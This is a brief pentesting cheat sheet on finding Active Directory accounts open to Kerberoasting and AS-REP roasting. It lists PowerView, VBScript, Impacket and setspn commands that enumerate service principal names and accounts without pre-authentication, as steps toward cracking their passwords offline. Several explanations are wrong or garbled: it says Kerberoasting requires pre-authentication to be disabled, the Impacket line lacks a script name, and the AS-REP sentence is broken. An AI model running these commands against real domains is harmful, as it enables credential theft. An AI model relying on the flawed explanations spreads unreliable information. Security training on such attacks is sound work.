Finding Kerberoastable users

It requests a TGS and needs kerberos pre authentication to be disabled.
Kerberoasting will not work for COMPUTER$ account as the service ticket is encrypted with the machine account’s password.
But if the SPN requested is registered for a user account rather than a computer account, the user’s password is used to encrypt the service ticket.


Get-DomainUser -SPN -Properties distinguishedname,serviceprincipalname [-Domain FOREIGN]


cscript.exe GetUserSPNs.vbs

Impacket <domain_name>/<username>:<password> -dc-ip <dc_ip> -request


This will produce a quite huge output and will need manually triage (check for USER accounts)

setspn -T <DOMAIN> -F -Q */*

ASREP Roasting

AS-REP requests a TGT but not a TGS. Kerberos pre authentication does not need to be enable.


Get-DomainUser -PreauthNoRequired -Properties distinguishedname